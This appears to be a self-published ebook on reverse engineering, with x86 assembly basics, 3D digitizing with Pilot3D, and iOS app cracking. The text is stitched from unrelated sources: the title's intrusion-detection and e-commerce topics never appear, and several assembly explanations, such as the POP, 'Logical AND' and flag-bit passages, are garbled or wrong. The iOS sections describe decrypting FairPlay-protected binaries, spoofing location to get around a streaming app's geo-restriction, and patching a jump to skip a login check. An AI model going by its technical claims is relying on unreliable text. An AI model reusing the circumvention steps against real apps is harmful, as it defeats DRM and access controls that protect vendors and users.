Penetration Testing and Reverse Engineering - Intrusioection Systems and E-Commerce Websites - Rob Kowalski
Penetration Testing and Reverse Engineering - Intrusioection Systems and E-Commerce Websites - Rob Kowalski
Penetration Testing and Reverse Engineering - Intrusioection Systems and E-Commerce Websites - Rob Kowalski
Rob Kowalski
Copyright 2016 by Rob Kowalski
http://www.esdcloudmedia.com
About The Author
Available on Amazon:
The Future UI/UX: From The Ground Up, Kate Owen
Paperback Edition:
http://www.amazon.com/Future-UI-UX-Ground-Up/dp/153956293X
Paperback Edition:
http://www.amazon.com/Magento-2-1-EE-Certification-
Guide/dp/1539945065
Paperback Edition:
http://www.amazon.com/Complete-Mens-Health-Plan-
Programs/dp/1539701093
Kindle Edition:
http://www.amazon.com/dp/B01J79NR72
The Future Javascript: Object Orientated Programming And
Beyond, Dr. Sergio Grisedale
Kindle Edition:
http://www.amazon.com/dp/B018CLL1II
Creating Web Applications On The Go, Frank Winchester
Paperback Edition:
http://www.amazon.com/Creating-Web-Applications-Frank-
Winchester/dp/153954592X
Kindle Edition:
http://www.amazon.com/dp/B01GX0PNPW
The Future SEO: For Your E-Commerce Website, James
King
Paperback Edition:
https://www.amazon.com/Future-SEO-Your-Ecommerce-
Website/dp/1539565203
Kindle Edition:
http://www.amazon.com/dp/B019L86H0S
Wordpress Security Essentials: For Webtrepreneurs, Web
Designers And Information Security Professionals, James King
Paperback Edition:
http://www.amazon.com/Wordpress-Security-Essentials-Webtrepreneurs-
Professionals/dp/1539563162
Kindle Edition:
http://www.amazon.com/dp/B01GOQ7UIS
The Complete Pinterest, J Lane
Paperback Edition
http://www.amazon.com/Complete-Pinterest-Your-Hobbies-
Business/dp/1539579751
Kindle Edition:
http://www.amazon.com/dp/B00NFRLJ46
About The Author
Introduction
Why Reverse Engineer?
An Overview of Reverse Engineering
Delving Deeper
Applied Reverse Engineering
Reverse Engineering And Assembly Code
A Methodology for Reverse Engineering
The Three Step Model
Assembly Language
3D Modeling Or Application Software
Reverse Engineering Using Pilot3D
Reverse Engineering iPhone Applications
Reverse Engineering Integral iOS Applications
Reverse Engineering Android Applications
Data Types
Malware Analysis
Reverse Engineering Linux Malware
Reverse engineering has its origins in the analysis of hardware for commercial
or military advantage. The purpose is to deduce design decisions from end
products with little or no additional knowledge about the procedures involved
in the original production. The same techniques are subsequently being
researched for application to legacy software systems, not for industrial or
defence ends, but rather to replace incorrect, incomplete, or otherwise
unavailable documentation.
Interoperability.
Security auditing.
Curiosity.
The following chapters explain the low level architecture of Windows and
Linux to a depth which will enable you to reverse engineer software as I go on
to explain later on.
Delving Deeper
In the world of reverse engineering, we often hear about black box testing.
Even though the tester has an API, their ultimate goal is to find the bugs by
hitting the product hard from outside. Apart from this, the main purpose of
reverse engineering is to audit the security, remove the copy protection,
customize the embedded systems, and include additional features without
spending much and other similar activities.
Where is Reverse Engineering Used?
Recent legal moves backed by many large software and hardware makers, as
well as the entertainment industry, are eroding companies' ability to do
reverse-engineering.
"Reverse-engineering is legal, but there are two main areas in which we're
seeing threats to reverse-engineering," says Jennifer Granick, director of the
law and technology clinic at Stanford Law School in Palo Alto, Calif. One
threat, as yet untested in the courts, comes from shrink-wrap licenses that
explicitly prohibit anyone who opens or uses the software from reverse-
engineering it, she says.
The other threat is from the Digital Millennium Copyright Act (DMCA), which
prohibits the creation or dissemination of tools or information that could be
used to break technological safeguards that protect software from being
copied. Last July, on the basis of this law, San Jose-based Adobe Systems Inc.
asked the FBI to arrest Dmitry Sklyarov, a Russian programmer, when he was
in the U.S. for a conference. Sklyarov had worked on software that cracked
Adobe's e-book file encryption.
The Stack
The stack is a memory area that can hold temporary data (functions parameters,
variables, etc.) and is designed to behave in a Last In, First Out context,
which means the first value stored in the stack (or pile) will be the last entry
out. The sample always given when it comes to explaining how the stack
works is plates stacked up to be washed; the last to be stacked will be the
first to be washed.
To be able to push data onto the stack and pop data from it, x86 assembly
uses the instructions PUSH and POP.
Push Instruction
Push is used to decrement the Stack Pointer (SP: ESP), and using PUSH we
can put a value on the top of the stack.
PUSH AX
PUSH BX
PUSH 1986
First push AX onto the stack, then BX then the value 1986; but its 1986 that
will be popped first.
Pop Instruction
Pop increments the Stack Pointer by loading values or data stored in the
location pointed to by SP.
POP AX
POP BX
PUSH CX
Assuming AX =1 and BX = 2, and following the example of Push, the top
most element, which is the value of BX (2), is stored in AX. Then BX contains
1, the value of AX. Now the stack is empty.
Flags
Flags are kind of indicator alterable by many instructions; they
describe the result of logical instruction, arithmetic and
mathematical instruction, instruction of comparison
Flags are regrouped into the Flags Register and its 16-bit register.
1. Bit 1: CF
2. Bit 2: 1 < Reserved
3. Bit 3: PF
4. Bit 4: 0 < Reserved
5. Bit 5: AF
6. Bit 6: 0 < Reserved
7. Bit 7: ZF
8. Bit 8: SF
9. Bit 9: TF
10. Bit 10: IF
11. Bit 11: DF
12. Bit 12: OF
13. Bit 13: IOPL
14. Bit 14: NT
15. Bit 15 : 0 < Reserved
16. Bit 16 : RF
17. Bit 17 : VM
Marked bits represent wildly used flags, and are used according to this:
CF Carry Flag: affected by the result of arithmetic
instructions, used to indicate when an arithmetic carry or borrow has
been generated out of the most significant ALU bit position. (Wikipedia)
PF Parity Flag: takes value 1 if an operands number of
bits is even.
AF Auxiliary Flag (or Adjust Flag): indicates when an
arithmetic carry or borrow has been generated out of the 4 least
significant bits. (Wikipedia)
ZF Zero Flag: used to check the result of arithmetic
operations. If an operand result is equal to 0, ZF takes the value 1, used
frequently to compare the result of a subtraction.
SF Sign Flag: takes the value 1 if the result of the last
mathematical operation is signed (+ / -)
IF Interrupt Flag: by taking the value 1, IF lets the CPU
handle hardware interrupts, if set to 0, the CPU will ignore such
interrupts.
DF Direction Flag: controls the direction of pointers
movement (on strings processing for example, left to right / right to left.)
OF Overflow Flag: indicates if an overflow occurred
during an operation and may also be used to correct some mathematical
operation errors in case of overflows (if overflow, OF takes the value 1).
Flags are directly related to conditional statements, which leads us to
introduce conditional jumps before talking about comparisons.
Conditional jumps
We are about to discuss an interesting part insofar as it helps to understand the
reaction of the program following the result of most operations (1 or 0).
To let a jump decide if it is taken or not, it needs to make some tests or
comparisons using instructions like:
CMP instruction
CMP compares two operands but does not store a result. Using this statement,
the program does a test between two values by subtracting them (it subtracts
the second operand from the first), and following the result (0 or 1), it changes
a given flag (Flags affected are OF, SF, ZF, AF, PF, and CF). For instance, if
the two given values are equal, Zero Flag holds the value 1, otherwise it holds
0. CMP can be compared to SUB, another mathematical instruction.
CMP AX, BX
Here CPM does AX-BX. If the result of this subtraction is equal to zero, the
AX is equal to BX and this will affect ZF by changing its value to 1.
To make it easier, jumps are TAKEN when:
Result is bigger than (unsigned numbers) > JA
Result is lower than (unsigned numbers) -> JB
Result is bigger than (signed numbers) > JG
Result is lower than (signed numbers) -> JL
Equality (signed and unsigned numbers) -> JE or JZ
Mathematical instructions
MUL instruction
Very useful, the CPU uses either the instruction MUL (for unsigned
multiplication) or IMUL (for signed multiplication). To do multiplication, it
multiplies an operand (a register or a memory operand) by AL, AX, or EAX
registers and stores the product on one or more registers (BX, CX).
With AX = 3 and BX = 5
MUL BX
IMUL instruction
It behaves in the same way as MUL, except being used for signed operations,
and preserves the sign of the product. Note that using the instruction CWD
(convert word to double) is a must. Extending the sign of AX into DX is a must
to avoid mistaken results.
With AL = 5 and BL = 12
IMUL BL
DIV instruction
Exactly the same as MUL and IMUL, DIV is used for unsigned divides and
does division on unsigned integers.
With AX = 18 and BX = 5
DIV BX
The result will be Quotient AX = 3 and remainder DX = 3
IDIV instruction
Used for signed integer divides and using the same operands as DIV
instruction, AL must be extended using the instruction CBW (convert byte to
word) to the high order register which is AH before executing IDIV.
With AL = -48 and BL = 5
MOV AL, -48 (puts -48 the dividend into AL)
CBW (extends AL into AH)
MOV BL, 5 (puts 5 the divisor into BL)
IDIV BL
The result will be AL=-9 and AH = -3
Negative numbers
At school when studying negative numbers things were really easy for us and
mush easier for teachers , just add negative sign - and you got your negative
number! Unfortunately things are a bit more complicated when it comes to x86
assembly code. In binary we cannot add -; there is only 0 and 1!
There is a method used that consists of:
1. Converting the concerned number to binary.
2. Reversing the binary bits (replace 0 by 1 and 1 by 0)
3. Adding 1 to the result
Lets take 5 for instance. Five in decimal is equivalent to 00000101(Tab 1) in
binary (actually 101 is OK but we need to work in 8 bit). By reversing bits we
get 11111010 and 11111010
+ 1 gives 11111011. So -5 in binary is equal to 11111011.
Logical AND
It does a logical negation on the specified operand and puts the result on the
same operand. It inverses the value of a bit, bites that equal zero become 1,
and vice versa.
NOT 0 = 1
NOT 1 = 0
MOV AX, 15
MOV BX, 25
NOT AX gives AX = 11110000 (15 = 00001111)
NOT BX gives BX = 11100110 (25 = 00011001)
Logical TEST
The instruction TEST does a non-destructive AND (or a logical compare), and
can alter flags depending on the result of the non-destructive AND between
two operands / values.
If both of the corresponding bits of the concerned operands are equal to 0, each
bite of the result is 0.
TEST AX, 1
If the first bit of AX is equal to 1, Zero Flag is set to 1 else
Zero Flag is set to 0.
Observe and assess the mechanisms that make the device work
Claim that the idea is not novel and is an obvious step for anyone
experienced in the particular field
Make a subtle change and claim that the changed product is not
protected by the patent
There are up to three steps in the process of reverse engineering. The first
step is to use some input device or technique to collect the raw geometry of the
object. This data is usually in the form of (x,y,z) points on the object relative
to some local coordinate system. These points may or may not be in any
particular order.
The second step is to use a computer program to read this raw point data and
to convert it into a usable form. This step is not as easy as it might seem.
The third step is to transfer the results from the reverse engineering software
into some 3D modeling or application software so that you can perform the
desired action on the geometry. Sometimes, steps 2 and 3 can be done inside
one program.
Questions
What is the size of the object you wish to digitize? This, of course, affects
the type of digitizing device you can use. Some input devices can be
repositioned to be able to handle larger objects, but you have to be concerned
about the potential loss of accuracy. Related questions are how much space
around the object do you have to work with and what are the environmental
conditions?
What level of accuracy do you need? Dont expect too much
accuracy. Although the digitizing device you use might be very accurate, you
are only collecting data at discrete points. These disjoint points must then be
curve-fit or surface-fit to create a useable 3D model. This fitting process is
where most of the accuracy errors are introduced. Even if you collect
thousands of data points on the object, you still will lose some accuracy when
the points are converted into a usable form. The accuracy of the input device
may not be the accuracy you achieve for the usable 3D computer model.
For the input devices, you also have to be careful about the accuracy figures
given. What is the best accuracy? What is the worst-case accuracy? What is
the repeatable accuracy? What is the digital accuracy (number of bits)? For
example, 2D scanners usually define both the optical resolution and the digital
resolution. The optical resolution is lower than the digital resolution, but the
devices can sometimes interpolate the raw, optical data to increase it to the full
digital resolution. The interpolated results, however, do not have the same
accuracy as a scanner that has a higher optical resolution. There can also be
other errors from other sources. If accuracy is that important to you, then you
must put the whole 3-step process to a test. Remember, however, that most of
the errors will be introduced during the conversion process from the raw data
into the usable 3D model.
What do you want to do with the data? This is perhaps the most important
question because it affects what hardware and software you need. If you just
want to recreate just the basic shape of an object for use in a fast-moving,
dynamic simulation, then accuracy is not critical and you want the data size of
the final 3D model to be small. Since you wont be using the 3D model for
construction or repair purposes, then you might only need a 3D polyhedron
(polygon) form. This will affect the type of software you need to convert the
raw data into a useable 3D model form. If, however, you need a very accurate
recreation of the object to perform a repair or alteration, then you will need to
convert the raw data to a different 3D modeling form, such as NURB
surfaces. If you also need to verify or prove that the final 3D computer model
is within a certain tolerance of the raw data, then you need to look for tools in
the software that make this task easier.
Generally speaking, for less accurate objects or organic objects, the goal is
to recreate the object in a 3D polygon-type form. If the object to be input is a
manufactured object with precise dimensions, then the goal is to recreate the
object using 3D NURB surfaces. NURB surfaces may also be used for less
accurate or organic objects, if the goal is to be able to perform large-scale
modifications to the object. These are not hard and fast rules, since there is a
good overlap of capability between organic, polygon or subdivision modelers
and NURB surface modelers.
Input Devices - The devices that input geometry into a computer can be
divided into two groups: 2D devices and 3D devices. The 2D input devices
consist of the following:
2D Scanners - These common devices work like digital photocopiers and are
good for small drawings or pictures. They are fast, but they only get the
drawing or picture into the computer as a matrix of color dots (a raster or
bitmap image), just like on the computer screen. The resolution might be very
high, but the raster format of the geometry may not be in a useful format. If a
drawing consists of a number of lines and curves that you want to work on or
use in some kind of 2D or 3D geometry modeling program, then you are out of
luck, unless you convert the raster image into some kind of line or vector
format. There are two ways to do this. One way is to use a raster to vector
conversion program. These programs look at the raster image and try to
connect the dots to form lines or curves that can be transferred to your design
program. As you can imagine, these raster to vector conversion programs can
get easily confused if many lines or curves cross each other on the
drawing. After this conversion, you might have to spend a lot of time in your
design program cleaning up the mess. It might be faster to use a 2D digitizer
tablet to input the data. Another way to convert the raster data to vector data is
to use a design program that can read the raster data and display the picture as
a background image. Then you can use your design program to recreate the
vector geometry by tracing over the raster image. This is kind of like doing
the digitizing right on the computer screen.
As you can probably see, there is no free lunch when it comes to getting
geometry into the computer in a usable form. If all you need to do is to scan a
drawing or photograph that you want to put on the web or into a report using a
word processor, then there is no need to convert the raster image into a vector
format. This is really not considered to be reverse engineering, however,
since you do not have to convert the raster image into a different, more usable
form.
The 3D input devices are generally broken into contact and non-contact types
and consist of the following:
All of these input devices collect raw (x,y,z) point data on the object and
store them in a computer file in the order that they were entered. Some devices
allow you to define start and stop codes while you digitize so that you can
identify connected points on the object, like a knuckle or hard edge. You might
think of this connected string of points as a polyline on the object. Other input
devices generate semi-random sequences of points, sometimes called point-
clouds of data. As discussed later, this point input order may make an
enormous difference in what reverse engineering software you can use and
how easy it is to convert the raw point data into useable and accurate 3D
geometry. All of the input devices are more concerned with the accurate input
of 3D point positions on the object than they are with the order or sequence of
the points in the data file. It is the job of the reverse engineering software or
the 3D modeling software to construct usable geometries based on these
points. This step can be quite tedious.
Assembly Language
Once you are familiar with assembly language, you should be able to start
reverse engineering software.
Special purpose reverse engineering programs may have many tools for
performing general 3D shape manipulation, but their main focus is on the
process of converting raw point data from the input devices into a more usable
polygon or NURB surface representation with the least loss of accuracy. You
would like to think that after this process is done, the final 3D computer model
passes exactly through all of the raw input data points. This may happen for a
polygon model, but the raw data rarely ever matches the exact needs of a
NURB surface model and the accuracy is less. The following two sequences
of steps show you what you might have to go through during the reverse
engineering process. The first sequence of steps is for point clouds of raw
input data and the second sequence of steps is for raw point data that is
organized sequentially along key paths on the object.
For Point Clouds of Data
1. Read the raw point data into the program from standard DXF or IGES files.
3. For point clouds of data, you need to use a program that has the capability
to wrap the cloud of points with 3D, connected polygons. If the point cloud
covers several objects, the user of the software may have to split the point
cloud into smaller sections before using the polygon wrapping capability. You
may also need tools to align point cloud data taken from different views of the
object.
For a wrapped polygon model, you may now be finished, if all you need is a
3D polygon model of the object for very simple rendering or display
purposes. However, most users need to modify the object or need to define
colors, textures, and a variety of other attributes for the polygon model. If the
wrapping process creates too many polygons for use by your modeling or
rendering software, then the reverse engineering software should provide some
way to reduce the number of polygons used while still maintaining control over
the accuracy of the model. At this point, you may be done with the reverse
engineering software and need to transfer the polygon model to your 3D
polygon modeler for further work or analysis.
4. If you need a more accurate definition of the object using NURB surfaces,
then you have more work to do. The object, now covered in polygons, must be
skinned or fitted with NURB surfaces. NURB surfaces have many nice
properties, but their major drawback is that they are rectangular in
nature. This doesnt mean that you cant stretch them into almost any shape. It
just means that to achieve a good NURB surface fit to an object, you need to
break the digitized object into a collection of rectangular-like areas. The more
non-rectangular the areas, the less accurate the fit will be. Some reverse
engineering programs try to convert the polygon model to a NURB model
automatically and some require user guidance. This is a trade-off; the
automatic methods will generate more NURB surfaces, but the manual methods
can be quite tedious. The ideal solution would be to combine the best of both
methods. Keep in mind that this is the process where most of the accuracy
errors are created. Generally, the more NURB surfaces you fit to the polygon
mesh, the more accurate the result will be, but more surfaces mean less
controllability, which is a problem if you want to modify the model.
5. The final step is to output the NURB surfaces in an IGES file format using
either type 128 NURB surfaces or type 143 or type 144 trimmed NURB
surfaces. These are the most common formats for transferring NURB surfaces
to other programs. If you plan to transfer these NURB surfaces to another
program, make sure that it can handle the format output from your reverse
engineering software.
Digitizing
For input digitizing devices that do not generate point clouds of data
automatically, the user has much more control over the number and sequence of
input points. This allows you to reduce the number of raw data points that you
have to deal with by entering a number of specially selected sequences of
points on the object. For example, the operator might control the 3D digitizer
to first enter all of the borders or hard boundary edges of the object. If the
object consists of all flat sides, then the task would be done. If the object
consisted of curved surfaces, the operator would additionally digitize several
evenly spaces cross-sections of the object. This means that the reverse
engineering software will have to deal with this data rather than an arbitrary
point cloud of data. If this is the technique that you will be using, then you
need to know what software you will be using for the reverse engineering
process and what its requirements are.
Even though you do not generate a massive point cloud of data of the object,
you can still use those programs that process your raw point data as a point
cloud and turns it into a 3D polygon mesh. The problem is that the polygon
wrapping process does not take into account the information associated with
the sequencing of the input points. Without a massive number of points, the
polygon wrapping technique might do a poor job. If your goal is to generate
just a 3D polygon representation of the object, then you will probably have to
use a polygon wrapping technique. This section, however, will describe the
general steps required to convert these sequenced points into NURB surfaces.
First, here are a few instructions for the input digitizing process. Since you are
not generating a point cloud of data and since you want to minimize the number
of points that you have to digitize, you first need to know what data works best
when converting the raw data into NURB surfaces. As discussed above,
NURB surfaces are rectangular-like surfaces defined by a grid of points,
organized as rows and columns. Before digitizing, you need to identify how
that object will be covered with the NURB surfaces. The following steps
show this process and start before you begin digitizing your sequence of
points.
1. Before digitizing, evaluate your object to see how it can be broken into one
or more rectangular-like NURB surfaces. Identify all paths that will become
the edges of the NURB surfaces.
2. During the input process, digitize each NURB surface edge as a connected
series of points. You can think of each sequence of points as a polyline. Once
you have digitized the surface edges, you need to digitize a series of cross-
sections through what will be each NURB surface, going from surface edge to
surface edge. Digitize the cross-sections perpendicular to what will be the
two long edges of the surface. Spread the cross-sections evenly across the
surface. The more sections that you digitize, the more accurate will be the
surface fit, but there is a point of diminishing returns. For surfaces without
much curvature, use 3 to 5 cross-sections. For more complicated surfaces,
increase the number of cross-sections. These digitized boundary edges and
cross-sections will be used by the reverse engineering software or 3D
modeling software to create NURB surfaces. If you spend some time
determining how the NURB surfaces will be fitted to your object, you will
save a lot of time in the reverse engineering process and the resultant surface
fit will be very accurate.
3. Read the raw data point files into your reverse engineering or 3D modeling
software. If the surface edge and cross-section points are not pre-connected as
polyline entities, then you need to use the software to connect the points that
define the edges and cross-sections into separate polylines. You should define
the edges of each surface as a separate polyline.
4. Fit each polyline with a curve. This step may or may not be necessary. It
depends on what the software needs to create a NURB surface. Some
programs can work with polylines and some require curves.
5. Use the proper command to skin or loft a NURB surface through all of the
surface cross-sections. As part of this skinning process, you need to include
the two surface edge curves that are parallel to the cross-sections. The
accuracy of this surface skinning or fitting process depends on how you define
and orient the surface on your object and how evenly spaced are your cross-
sections.
6. Once the NURB surface has been created, you will have to compare the
resultant surface with the raw input data points. Some programs give you tools
to show locations and magnitudes of the errors. If there arent any, then you
will have to use the program to look at the created surface from all views and
zoom in to locate any errors.
7. Repeat steps 4-6 for each surface to be constructed. As you can see, the
digitizing and reverse engineering process depends a lot on a good
understanding of NURB surfaces.
8. The final step is to output the NURB surfaces in an IGES file format using
either type 128 NURB surfaces or type 143 or type 144 trimmed NURB
surfaces. These are the most common formats for transferring NURB surfaces
to other programs. If you plan to transfer these NURB surfaces to another
program, make sure that it can handle the format output from your reverse
engineering software.
Note: If the area to be digitized is definitely not rectangular, then you will
have to either decide how the rectangular NURB surface will be distorted to
fit, or you can digitize past the edges to create a rectangular shape. If you
digitize past the desired edges, then you should still digitize the edge that you
went past. This edge will be used to trim the oversized NURB surface.
3D Modeling Or Application
Software
The purpose of reverse engineering a 3D model of an object is to do something
with the result. If the ultimate task is simply to display or render the model,
then you would probably only need a polygon model and the ultimate
application would be a rendering program. If you need to do other tasks, like
shape alteration or construction of templates for repairs, then you would
probably need a NURB surface definition and a general-purpose 3D modeling
program. Other possible tasks are things like finite element analysis (FEA) or
computational fluid dynamics (CFD) analysis. These analyses might require
only a 3D polygon model, but the polygons might have to be radically adjusted
to meet the needs of the analysis program.
Summary
The first thing you need to do is to define the accuracy you need and determine
what you want to do with the 3D model once you get it in the computer. The
next step is to select the software that will perform those tasks and determine
whether they require only a polygon model or whether they require a NURB
surface definition. Once this has been defined, you can then tackle the
selection of the input device and the reverse engineering software.
Reverse Engineering Using Pilot3D
This discussion covers manual contact input digitizing devices that generate
points in sequence under user control. These manual digitizers (not 3D
scanners that generate point clouds of data) allow you to reduce the number of
raw data points that you have to deal with by entering a number of specially
selected sequences of points on the object. However, you cannot input just any
points. You have to know what points are required by the software. For
example, the operator might control the 3D digitizer to first enter all of the
borders or hard boundary edges of the object. If the object consists of all flat
sides, then the task would be done. If the object consists of curved surfaces,
the operator would additionally digitize several evenly spaces cross-sections
of the object. The amount of points that need to be digitized, the spacing of the
points and the orientation of these points greatly affect the ease and accuracy of
generating the final 3D computer model.
The problem is that NURBs are rather fussy mathematical tools. They are
rectangular in nature and behave badly if they are stretched into very odd
shapes. This means that you must look at the object you want to digitize and
determine how you can break it into one or more rectangular-like shapes. The
surfaces do not have to be perfectly rectangular. They can even be triangular
in shape by making one side of the rectangular surface zero. However, if your
surface has 5 or more sides with sharp, knuckle points along the edge, then you
will have to break the surface into multiple NURB surfaces. Either that, or you
will have to define an over-sized rectangular surface and use the actual surface
edges as trimming curves on the surface.
Another thing to keep in mind is that Pilot3D creates a NURB surface by
lofting or skinning a surface through a collection of polylines or curves. These
curves should be fairly evenly spaced and should cover the entire NURB
surface region. After you decide how the rectangular-like NURBs will fit on
your object, you need to digitize what will become the boundaries of the
NURB surfaces and then digitize a number of cross-sections over the surface,
perpendicular to the long edges of the surface.
1. Before digitizing, evaluate your object to see how it can be broken into one
or more rectangular-like NURB surfaces. Identify all paths that will become
the edges of the NURB surfaces. Then determine a number of cross-sections
over each surface perpendicular to the long edges of each surface. If desired,
you can mark the paths and cross-sections on the object before digitizing.
2. During the input process, digitize each NURB surface edge as a connected
series of points. You can think of each sequence of points as a polyline. If
your digitizer can link points together and mark them as a polyline, you should
do so. Otherwise, you will have to use Pilot3D to create polylines from the
raw point data to create the 4 surface edges and all of the cross-sections. Once
you have digitized the surface edges, you need to digitize a series of cross-
sections through what will be each NURB surface, going from surface edge to
surface edge. Digitize the cross-sections perpendicular to what will become
the two long edges of the surface. Spread the cross-sections evenly across the
surface. The more sections that you digitize, the more accurate will be the
surface fit, but there is a point of diminishing returns. For surfaces without
much curvature, use about 5 cross-sections. For more complicated surfaces or
for more accuracy, increase the number of cross-sections. These digitized
boundary edges and cross-sections will be used by Pilot3D to create NURB
surfaces. If you spend some time determining how the NURB surfaces will be
fitted to your object, you will save a lot of time in the NURB surface fitting
process and the resultant surface fit will be very accurate.
If you have to create an over-sized NURB surface because the shape that you
are digitizing is not rectangular at all, then you must digitize both the actual
surface edges and digitize the edges that will become the edges of the over-
sized NURB surface. Then you must digitize the cross-sections over the entire
over-sized NURB surface area, not just the actual surface area. The actual
surface edges will be used to trim the over-sized NURB surface to the actual
shape of the surface.
Dont be overly concerned about trying to get perfect input points because
Pilot3D can do a lot of manipulation to the raw data to get it to meet the
skinning needs of the NURB surfaces.
3. Save the digitized points in a DXF or IGES type file for reading into
Pilot3D.
4. Read the raw data point files into Pilot3D using one of the File-Data File
Input commands. If the surface edge and cross-section points are not pre-
connected as polyline entities, then you need to use the software to connect the
points that define the edges and cross-sections into separate polylines. You
should define the 4 edges of each surface as separate polylines. To create a
polyline or curve from point data in Pilot3D, use the Curve-Add Polyline or
Curve-Add Curve command. Instead of using the left mouse button to define
each point, move the cursor near each digitized point and hit the p key on the
keyboard. This tells the program to snap the input polyline or curve point to
the point nearest to the cursor. This process can be continued until a curve or
polyline is created using all of the raw data points. This is rather tedious if
you have a lot of data points. That is why it is recommended that the creation
of polylines in the digitizing software is helpful, if it can be done. When you
are creating each of these polylines or curves, create one for each of the 4
surface edges and one for each of the cross-sections of the surface. These
boundary edges and cross-sections are what Pilot3D uses to skin and create
NURB surfaces.
5. Fit each polyline with a curve using the Curve-Curvefit command. This
step is not required in Pilot3D for the surface skinning step, but it is a good
idea. The curves will give you an idea of how the program will fit the rows or
columns to the cross-sections. If the curvefit is bad, then you can adjust the
shape using the point editing tools to create a better fit. You can use the
original raw data points as guides to make sure that your corrections do not
stray too far from the actual shape. Now you are ready to create the NURB
surface from the cross-sections.
6. Use the Create 3D-Skin/Loft Surf command to skin or loft a NURB surface
through all of the surface cross-sections. When you select this command, the
program will prompt you to pick each cross-section, in sequence, across the
surface. Note that you should include the two surface edges that are parallel to
the cross-sections! When picking each cross-section, you need to pick each
curve near the same end. The reason for this is that the program is rather dumb
and needs you to tell it which ends of the curves should be connected
together. This may seem obvious to a human, but there are some cases that
could be quite confusing for the program to figure out automatically. After you
select all of the cross-sections (and the 2 parallel edge curves), the program
will show you a dialog box with a number of options. The important one is to
define how many rows you wish to fit through the cross-sections. The more
rows you enter, the more accurate the fit will be, but more rows will make it
more difficult to edit or smooth the surface. Smoother or simpler surfaces
require fewer rows (perhaps 5), but surfaces with more curvature require a
higher number. The accuracy of this surface skinning or fitting process
depends on how you define and orient the surface on your object and how
evenly spaced are your cross-sections.
7. Once the NURB surface has been created, you will have to compare the
resultant surface with the raw input data points. This can be done by zooming
in on the rows and columns of the surface and checking on how far the raw
data points are from the surface. If any corrections need to be made, you can
use any of the surface editing commands to create a better fit of the surface to
the data points. If you do not like how the NURB surface was created, then
you can use the Undo command and try again. Keep in mind, however, that
fitting a NURB surface to a collection of points is a difficult task, especially if
accuracy is a concern. In most cases, you will have to adjust the NURB
surface using the edit commands to get the best fit. Carefully zoom in on each
portion of each row and column and look at how closely the surface matches
the raw data points. At this point you really need to know what kind of
accuracy is needed for your task. Otherwise, you could be spending hours
trying to fix things that dont matter.
Summary
- Pilot3D uses NURB surfaces that work best when they are
rectangular in shape
- You will have to edit the fitted NURB surface until you match
the raw data within the desired tolerance
Reverse Engineering iPhone
Applications
Why should I reverse engineer an iOS App?
Requirements:
First of all you need to have an jailbroken iPad or iPhone/iPod. In my case I
use an iPad 4 running with iOS 8, jailbroken with Pangu. To follow this
tutorial you need to have to need some Cydia packets installed. To disassemble
the file on you computer/mac you will need Hopper
( http://www.hopperapp.com )
Rasticrac
You need to have Rasticrac installed because every iOS Binary is encrypted
with FairPlay DRM. Rasticrac is an easy to use tool that decrypt the iOS
Binary, otherwise you can not disassemble it with Hopper.
Repo Source
You can install Rasticrac with Cydia ,just add the following Repo source in
Cydia:
http://cydia.iphonecake.com
Now just search for it and install it.
Ldone
With Ldone you can resign the iOS Binary so you be able to run it after
modifying.
Repo Source
NewTerm
You need to have NewTerm installed to set up Rasticarc and ldone. Just search
for NewTerm in Cydia, you will find it in the already added iPhoneCake repo.
Just search for it and install it.
rasticrac.sh -m
The Rastcrac menu will be shown. Rasicrac will list the installed Apps on you
device, it will list the Apps with a number or a letter. You have to enter the
corresponding letter/number for the app you want to decrypt.
Example: m: Clash of Clans
In this case you have to enter m, if you want to decrypt the Clash of Clans
binary.
Rasticrac will put the decrypted .ipa of the App in:
/var/root/Documents/Cracked
Now you can see the disassembly of the iOS Binary you can do now changes
on the Binary!
The most difficult and time consuming part is recognizing the classes and the
objects used to call required methods. The traditional approach is to perform a
class dump of the binary to get the methods that can be invoked.
We can use 'Crackulous' to dump out the unencrypted version of the application
and use 'class-dump-z' to spit out the method names present in the _OBJC
segment. There are also a couple of tools (iNalyzer and Snoop-it) that save a
lot of time and perform reverse engineering and function hooking for the entire
application.
I have analyzed the TWCSportsNet application in this blog. The reason why I
choose this application is because it has two security controls implemented. It
does not work if the following conditions are not met:
We will bypass those restrictions by using two modern tools called iNalyzer
and Snoop-it.
iNalyzer:
Limits of iNalyzer:
It does not let us dynamically analyze the work flow of the application. For
example, if we click a send button on an iOS application, we do not get to see
the classes and the various methods that will be invoked.
The location has been updated and sent to the server through an HTTP request
which sends my current latitude and longitude. We can trace the calls and
corresponding methods when any kind of activity is performed by enabling the
Method Tracing Functionality.
The request can be intercepted and by changing the longitude and latitude to a
location in Los Angeles, we can view live television and bypass the location
restriction. Although this could be performed directly via manipulation of
parameters via a proxy, Snoop-it and iNalyzer gives us an in-depth view about
the inner functionality of the application.
There are various other functionalities like monitoring the file system, checking
out stored values in keychains and looking at the network traffic which can
come in handy to save time during penetration testing of iOS applications.
Reverse Engineering Integral iOS
Applications
Today I will show you how to bypass an iOS log-in screen in an iOS
Application. To show you how it works we will need a little iOS demo App
made by me, in the demo Application is a working log-in view and to get to, I
call it the "secret ViewController" , you have to enter a username and a
password (that you don't know !). We will modify the app so , that you can get ,
without entering a username or password, to the "secret ViewController" !
Requirements
You need an jailbroken iOS device (I use an iPad 4 running iOS 8.0, jailbroken
with Pangu). You also need some Cydia packets installed to follow this
tutorial.
New Term
New Term is an mobile terminal, you will need it to set up ldone for resigning
the iOS binary.
With Ldone you can resigning the modden iOS binary, so you can run a
manipulated binary on you jailbroken iDevice. You can find it in
the http://repo.insanelyi.com repository (just add it in Cydia) .
Hopper
Hopper is a reverse engineering tool for mac/pc, you can disassemble the
decrypted iOS Binary with it. You can buy Hopper at http://hopperapp.com/.
To get the binary open iFile on your iDevice and start the web server.
After you have done this open Safari on you mac/pc and enter the IP address of
you iDevice (In my case it
was http://192.168.178.36:10000 or http://YouriPad.local:10000 ) . Now
you should see something like this:
Now navigate to /var/mobile/Containers/Bundle/Application/[app
name]/LOGINVIEW.app
(In my case [app name] was 2974EF19-3D00-4B19-B74B-D7819BD7BD20
but they are on every device different). You should see something like this:
So we know that the app will "jumps" to 0xa904 if the username and the
password are correct and it will "jumps" to 0xa9d2 if the login credentials are
wrong. So what we have to do now, is to modify the program flow in that way,
that when the wrong login credentials are entered the app also "jumps"
to 0xa904 . So, thats really easy we just have to modify this line
in [ViewController login_action] :
After you modded the Binary go to you iDevice open iFile and navigate
to var/mobile/Containers/Bundle/Applications/Containers/Bundle/LOGINVIEW/LOGINV
delete the old Binary. Now start the iFile WebServer again and navigate
